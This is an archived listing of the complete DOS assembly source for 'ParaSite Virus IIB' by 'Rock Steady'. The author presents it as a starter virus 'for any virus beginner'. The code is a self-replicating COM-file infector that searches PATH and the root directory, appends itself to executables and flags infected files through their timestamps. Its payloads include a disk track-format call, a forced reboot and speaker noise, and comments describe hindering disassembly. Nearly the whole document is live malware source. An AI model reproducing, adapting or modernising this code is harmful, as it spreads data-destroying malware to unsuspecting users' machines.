home *** CD-ROM | disk | FTP | other *** search
/ Hacker 2 / HACKER2.mdf / virus / parasite.2b < prev    next >
Text File  |  1995-01-03  |  31KB  |  421 lines

  1. ;********************************************************************    
  2. ;   <PARSIT2B.ASM>   -   ParaSite Virus IIB                              
  3. ;                        By: Rock Steady                                 
  4. ;  Close to one year I created this Virus. As you can see it is quite    
  5. ;  old... Maybe too Old... But here it is... It Sucks... but its great   
  6. ;  for any virus beginner... Anyhow...                                   
  7. ;  NOTES: Simple COM infector. 10% of the time it reboots the system     
  8. ;         20% it plays machine gun noices on the PC speaker... and       
  9. ;         70% of the time is infects another COM file... Have fun...     
  10. ;********************************************************************    
  11. MOV_CX  MACRO X                                                          
  12.         DB    0B9H                                                       
  13.         DW    X                                                          
  14. ENDM                                                                     
  15.                                                                          
  16. CODE    SEGMENT                                                          
  17.         ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE                           
  18.         ORG     100H                                                     
  19.                                                                          
  20.                                                                          
  21. VCODE:  JMP     virus                                                    
  22.                                                                          
  23.         NOP                                                              
  24.         NOP                             ; To identify it as an Infected  
  25.         NOP                             ; Program!                       
  26.                                                                          
  27. v_start equ     $                                                        
  28.                                                                          
  29.                                                                          
  30. virus:  PUSH    CX                                                       
  31.         MOV     DX,OFFSET vir_dat                                        
  32.         CLD                                                              
  33.         MOV     SI,DX                                                    
  34.         ADD     SI,first_3                                               
  35.         JMP     Rock_1                                                   
  36. Rock_2:                                                                  
  37.         MOV     DX,dta                                                   
  38.         ADD     DX,SI                                                    
  39.         MOV     AH,1AH                                                   
  40.         INT     21H                                                      
  41.         PUSH    ES                                                       
  42.         PUSH    SI                                                       
  43.         MOV     ES,DS:2CH                                                
  44.         MOV     DI,0                                                     
  45.         JMP     Day_Of_Week                                              
  46. Rock_1:                                                                  
  47.         MOV     CX,3                                                     
  48.         MOV     DI,OFFSET 100H                                           
  49.         REPZ    MOVSB                                                    
  50.         MOV     SI,DX                                                    
  51.         PUSH    ES                                                       
  52.         MOV     AH,2FH                                                   
  53.         INT     21H                                                      
  54.         MOV     [SI+old_dta],BX                                          
  55.         MOV     [SI+old_dts],ES                                          
  56.         POP     ES                                                       
  57.         JMP     Rock_2                                                   
  58.                                                                          
  59. Day_Of_Week:                                                             
  60.         MOV     AH,2AH                  ;Get System date!                
  61.         INT     21H                                                      
  62.         CMP     AL,1                    ;Check to See if it's Monday!    
  63.         JGE     day_check               ;Jump if later than Mondays      
  64.         JMP     Get_Time                                                 
  65. day_check:                                                               
  66.         CMP     AL,1                    ;Check to see if it is the 1st   
  67.         JA      Get_Time                ;If yes, create a MESS...        
  68.         JMP     Bad_Mondays             ;If not, then go on with infecti 
  69. mess:                                                                    
  70.                                                                          
  71. Bad_Mondays:                                                             
  72.           MOV   DL,2                    ;The Formatting Tracks..         
  73.           MOV   AH,05                                                    
  74.           MOV   DH,80h                                                   
  75.           MOV   CH,0                                                     
  76.           INT   13h                                                      
  77.                                                                          
  78. Play_music:                                                              
  79.           MOV   CX,20d                  ;Set number of Shots             
  80. new_shot:                                                                
  81.           PUSH  CX                      ;Save Count                      
  82.           CALL  Shoot                                                    
  83.           MOV   CX,4000H                                                 
  84. Silent:   LOOP  silent                                                   
  85.           POP   CX                                                       
  86.           LOOP  new_Shot                                                 
  87.           JMP   mess                                                     
  88.                                                                          
  89. SHOOT     proc  near                    ;The Machine Gun Noices...       
  90.           MOV   DX,140h                                                  
  91.           MOV   BX,20h                                                   
  92.           IN    AL,61h                                                   
  93.           AND   AL,11111100b                                             
  94. SOUND:    XOR   AL,2                                                     
  95.           OUT   61h,al                                                   
  96.           ADD   dx,9248h                                                 
  97.           MOV   CL,3                                                     
  98.           ROR   DX,CL                                                    
  99.           MOV   CX,DX                                                    
  100.           AND   cx,1ffh                                                  
  101.           OR    CX,10                                                    
  102. WAITA:    LOOP  WAITA                                                    
  103.           DEC   BX                                                       
  104.           JNZ   SOUND                                                    
  105.           AND   AL,11111100b                                             
  106.           OUT   61h,AL                                                   
  107.           RET                                                            
  108. Shoot     Endp                                                           
  109.                                                                          
  110. Get_Time:                                                                
  111.           MOV   AH,2Ch                  ; Get System Time!               
  112.           INT   21h                     ;                                
  113.           AND   DH,0fh                                                   
  114.           CMP   DH,3                                                     
  115.           JB    Play_music                                               
  116.           CMP   DH,3h                                                    
  117.           JA    Find_Path                                                
  118.           INT   19h                                                      
  119.                                                                          
  120. go:                                                                      
  121.         MOV     AH, 47H                                                  
  122.         XOR     DL,DL                                                    
  123.         ADD     SI, OFFSET orig_path - OFFSET buffer - 8                 
  124.         INT     21H                                                      
  125.         JC      find_path                                                
  126.                                                                          
  127.         MOV     AH,3BH                                                   
  128.         MOV     DX,SI                                                    
  129.         ADD     DX, OFFSET root_dir - OFFSET orig_path                   
  130.         INT     21H                                                      
  131.                                                                          
  132. infect_root:                                                             
  133.         MOV     [BX+nam_ptr],DI                                          
  134.         MOV     SI,BX                                                    
  135.         ADD     SI,f_ipec                                                
  136.         MOV     CX,6                                                     
  137.         REPZ    MOVSB                                                    
  138.         JMP     hello                                                    
  139.                                                                          
  140. find_path:                                                               
  141.         POP     SI                      ; Seek and Destroy...            
  142.         PUSH    SI                                                       
  143.         ADD     SI,env_str                                               
  144.         LODSB                                                            
  145.         MOV     CX,OFFSET 8000H                                          
  146.         REPNZ   SCASB                                                    
  147.         MOV     CX,4                                                     
  148.                                                                          
  149. check_next_4:                                                            
  150.         LODSB                                                            
  151.         SCASB                                                            
  152. ;                                                                        
  153. ; The JNZ line specifies that if there is no PATH present, then we will  
  154. ; along and infect the ROOT directory on the default drive.              
  155.                                                                          
  156.         JNZ     find_path               ;If not path, then go to ROOT di 
  157.         LOOP    check_next_4            ;Go back and check for more char 
  158.         POP     SI                      ;Load in PATH again to look for  
  159.         POP     ES                                                       
  160.         MOV     [SI+path_ad],DI                                          
  161.         MOV     DI,SI                                                    
  162.         ADD     DI,wrk_spc                                               
  163.         MOV     BX,SI                                                    
  164.         ADD     SI,wrk_spc              ;the File Handle                 
  165.         MOV     DI,SI                                                    
  166.         JMP     SHORT   slash_ok                                         
  167.                                                                          
  168. set_subdir:                                                              
  169.         CMP     WORD PTR [SI+path_ad],0                                  
  170.         JNZ     found_subdir                                             
  171.         JMP     all_done                                                 
  172.                                                                          
  173.                                                                          
  174. found_subdir:                                                            
  175.         PUSH    DS                                                       
  176.         PUSH    SI                                                       
  177.         MOV     DS,ES:2CH                                                
  178.         MOV     DI,SI                                                    
  179.         MOV     SI,ES:[DI+path_ad]                                       
  180.         ADD     DI,wrk_spc              ;DI is the handle to infect!     
  181.                                                                          
  182.                                                                          
  183. move_subdir:                                                             
  184.         LODSB                           ;To tedious work to move into su 
  185.         NOP                                                              
  186.         CMP     AL,';'                  ;Does it end with a ; character? 
  187.         JZ      moved_one               ;if yes, then we found a subdir  
  188.         CMP     AL,0                    ;is it the end of the path?      
  189.         JZ      moved_last_one          ;if yes, then we save the PATH   
  190.         STOSB                           ;marker into DI for future refer 
  191.         JMP     SHORT   move_subdir                                      
  192.                                                                          
  193. moved_last_one:                                                          
  194.         MOV     SI,0                                                     
  195.                                                                          
  196. moved_one:                                                               
  197.         POP     BX                      ;BX is where the virus data is   
  198.         POP     DS                      ;Restore DS                      
  199.         NOP                                                              
  200.         MOV     [BX+path_ad],SI         ;Where is the next subdir?       
  201.         CMP     CH,'\'                  ;Check to see if it ends in \    
  202.         JZ      slash_ok                ;If yes, then it's OK            
  203.         MOV     AL,'\'                  ;if not, then add one...         
  204.         STOSB                           ;store the sucker                
  205.                                                                          
  206.                                                                          
  207.                                                                          
  208. slash_ok:                                                                
  209.         MOV     [BX+nam_ptr],DI         ;Move the filename into workspac 
  210.         MOV     SI,BX                   ;Restore the original SI value   
  211.         ADD     SI,f_spec               ;Point to COM file victim        
  212.         MOV     CX,6                                                     
  213.         REPZ    MOVSB                   ;Move victim into workspace      
  214. hello:                                                                   
  215.         MOV     SI,BX                                                    
  216.         MOV     AH,4EH                                                   
  217.         MOV     DX,wrk_spc                                               
  218.         ADD     DX,SI                   ;DX is ... The File to infect    
  219.         MOV     CX,3                    ;Attributes of Read Only or Hidd 
  220.         INT     21H                                                      
  221.         JMP     SHORT   find_first                                       
  222. joe1:                                                                    
  223.         JMP     go                                                       
  224.                                                                          
  225. find_next:                                                               
  226.         MOV     AH,4FH                                                   
  227.         INT     21H                                                      
  228.                                                                          
  229. find_first:                                                              
  230.         JNB     found_file              ;Jump if we found it             
  231.         JMP     SHORT   set_subdir      ;Otherwise, get another subdirec 
  232.                                                                          
  233. found_file:                                                              
  234.         MOV     AX,[SI+dta_tim]         ;Get time from DTA               
  235.         AND     AL,1EH                  ;Mask to remove all but seconds  
  236.         CMP     AL,1EH                  ;60 seconds                      
  237.         JZ      find_next                                                
  238.         CMP     WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too LON 
  239.         JA      find_next               ;If too long, find another one   
  240.         CMP     WORD PTR [SI+dta_len],0AH ;Is it too short?              
  241.         JB      find_next               ;Then go find another one        
  242.         MOV     DI,[SI+nam_ptr]                                          
  243.         PUSH    SI                                                       
  244.         ADD     SI,dta_nam                                               
  245.                                                                          
  246. more_chars:                                                              
  247.         LODSB                                                            
  248.         STOSB                                                            
  249.         CMP     AL,0                                                     
  250.         JNZ     more_chars                                               
  251.         POP     SI                                                       
  252.         MOV     AX,OFFSET 4300H                                          
  253.         MOV     DX,wrk_spc                                               
  254.         ADD     DX,SI                                                    
  255.         INT     21H                                                      
  256.         MOV     [SI+old_att],CX                                          
  257.         MOV     AX,OFFSET 4301H                                          
  258.         AND     CX,OFFSET 0FFFEH                                         
  259.         MOV     DX,wrk_spc                                               
  260.         ADD     DX,SI                                                    
  261.         INT     21H                                                      
  262.         MOV     AX,OFFSET 3D02H                                          
  263.         MOV     DX,wrk_spc                                               
  264.         ADD     DX,SI                                                    
  265.         INT     21H                                                      
  266.         JNB     opened_ok                                                
  267.         JMP     fix_attr                                                 
  268.                                                                          
  269. opened_ok:                                                               
  270.         MOV     BX,AX                                                    
  271.         MOV     AX,OFFSET 5700H                                          
  272.         INT     21H                                                      
  273.         MOV     [SI+old_tim],CX         ;Save file time                  
  274.         MOV     [SI+ol_date],DX         ;Save the date                   
  275.         MOV     AH,2CH                                                   
  276.         INT     21H                                                      
  277.         AND     DH,7                                                     
  278.         JMP     infect                                                   
  279.                                                                          
  280.                                                                          
  281. infect:                                                                  
  282.         MOV     AH,3FH                                                   
  283.         MOV     CX,3                                                     
  284.         MOV     DX,first_3                                               
  285.         ADD     DX,SI                                                    
  286.         INT     21H             ;Save first 3 bytes into the data area   
  287.         JB      fix_time_stamp                                           
  288.         CMP     AX,3                                                     
  289.         JNZ     fix_time_stamp                                           
  290.         MOV     AX,OFFSET 4202H                                          
  291.         MOV     CX,0                                                     
  292.         MOV     DX,0                                                     
  293.         INT     21H                                                      
  294.         JB      fix_time_stamp                                           
  295.         MOV     CX,AX                                                    
  296.         SUB     AX,3                                                     
  297.         MOV     [SI+jmp_dsp],AX                                          
  298.         ADD     CX,OFFSET c_len_y                                        
  299.         MOV     DI,SI                                                    
  300.         SUB     DI,OFFSET c_len_x                                        
  301.         JMP     CONT                                                     
  302. JOE2:                                                                    
  303.         JMP     JOE1                                                     
  304. CONT:                                                                    
  305.         MOV     [DI],CX                                                  
  306.         MOV     AH,40H                                                   
  307.         MOV_CX  virlen                                                   
  308.         MOV     DX,SI                                                    
  309.         SUB     DX,OFFSET codelen                                        
  310.         INT     21H                                                      
  311.         JB      fix_time_stamp                                           
  312.         CMP     AX,OFFSET virlen                                         
  313.         JNZ     fix_time_stamp                                           
  314.         MOV     AX,OFFSET 4200H                                          
  315.         MOV     CX,0                                                     
  316.         MOV     DX,0                                                     
  317.         INT     21H                                                      
  318.         JB      fix_time_stamp                                           
  319.         MOV     AH,40H                                                   
  320.         MOV     CX,3                                                     
  321.         MOV     DX,SI                                                    
  322.         ADD     DX,jmp_op                                                
  323.         INT     21H                                                      
  324.                                                                          
  325. fix_time_stamp:                                                          
  326.         MOV     DX,[SI+ol_date]                                          
  327.         MOV     CX,[SI+old_tim]                                          
  328.         AND     CX,OFFSET 0FFE0H                                         
  329.         OR      CX,1EH                                                   
  330.         MOV     AX,OFFSET 5701H                                          
  331.         INT     21H                                                      
  332.         MOV     AH,3EH                                                   
  333.         INT     21H                                                      
  334.                                                                          
  335. fix_attr:                                                                
  336.         MOV     AX,OFFSET 4301H                                          
  337.         MOV     CX,[SI+old_att]                                          
  338.         MOV     DX,wrk_spc                                               
  339.         ADD     DX,SI                                                    
  340.         INT     21H                                                      
  341.                                                                          
  342. all_done:                                                                
  343.         PUSH    DS                                                       
  344.         MOV     AH,1AH                                                   
  345.         MOV     DX,[SI+old_dta]                                          
  346.         MOV     DS,[SI+old_dts]                                          
  347.         INT     21H                                                      
  348.         POP     DS                                                       
  349.                                                                          
  350. quit:                                                                    
  351.         MOV     BX,OFFSET count                                          
  352.         CMP     BX,0                                                     
  353.         JB      joe2                                                     
  354.         POP     CX                                                       
  355.         XOR     AX,AX                   ;XOR values so that we will give 
  356.         XOR     BX,BX                   ;poor sucker a hard time trying  
  357.         XOR     DX,DX                   ;reassemble the source code if h 
  358.         XOR     SI,SI                   ;decides to dissassemble us.     
  359.         MOV     DI,OFFSET 0100H                                          
  360.         PUSH    DI                                                       
  361.         XOR     DI,DI                                                    
  362.         RET     0FFFFH                  ;Return back to the beginning    
  363.                                         ;of the program                  
  364.                                                                          
  365. vir_dat EQU     $                                                        
  366.                                                                          
  367. Aurther DB      "ParaSite IIB - By: Rock Steady"                         
  368. olddta_ DW      0                                                        
  369. olddts_ DW      0                                                        
  370. oldtim_ DW      0                                                        
  371. count_  DW      0                                                        
  372. oldate_ DW      0                                                        
  373. oldatt_ DW      0                                                        
  374. first3_ EQU     $                                                        
  375.         INT     20H                                                      
  376.         NOP                                                              
  377. jmpop_  DB      0E9H                                                     
  378. jmpdsp_ DW      0                                                        
  379. fspec_  DB      '*.COM',0                                                
  380. fipec_  DB      'COMMAND.COM',0                                          
  381. pathad_ DW      0                                                        
  382. namptr_ DW      0                                                        
  383. envstr_ DB      'PATH='                                                  
  384. wrkspc_ DB      40h dup (0)                                              
  385. dta_    DB      16h dup (0)                                              
  386. dtatim_ DW      0,0                                                      
  387. dtalen_ DW      0,0                                                      
  388. dtanam_ DB      0Dh dup (0)                                              
  389. buffer  DB      0CDh, 20h, 0, 0, 0, 0, 0, 0                              
  390. orig_path DB    64 dup (?)                                               
  391. root_dir DB     '\',0                                                    
  392. lst_byt EQU     $                                                        
  393. virlen  =       lst_byt - v_start                                        
  394. codelen =       vir_dat - v_start                                        
  395. c_len_x =       vir_dat - v_start - 2                                    
  396. c_len_y =       vir_dat - v_start + 100H                                 
  397. old_dta =       olddta_ - vir_dat                                        
  398. old_dts =       olddts_ - vir_dat                                        
  399. old_tim =       oldtim_ - vir_dat                                        
  400. ol_date =       oldate_ - vir_dat                                        
  401. old_att =       oldatt_ - vir_dat                                        
  402. first_3 =       first3_ - vir_dat                                        
  403. jmp_op  =       jmpop_  - vir_dat                                        
  404. jmp_dsp =       jmpdsp_ - vir_dat                                        
  405. f_spec  =       fspec_  - vir_dat                                        
  406. f_ipec  =       fipec_  - vir_dat                                        
  407. path_ad =       pathad_ - vir_dat                                        
  408. nam_ptr =       namptr_ - vir_dat                                        
  409. env_str =       envstr_ - vir_dat                                        
  410. wrk_spc =       wrkspc_ - vir_dat                                        
  411. dta     =       dta_    - vir_dat                                        
  412. dta_tim =       dtatim_ - vir_dat                                        
  413. dta_len =       dtalen_ - vir_dat                                        
  414. dta_nam =       dtanam_ - vir_dat                                        
  415. count   =       count_  - vir_dat                                        
  416.          CODE    ENDS                                                    
  417. END     VCODE                                                            
  418.  
  419.  
  420. Downloaded From P-80 International Information Systems 304-744-2253
  421.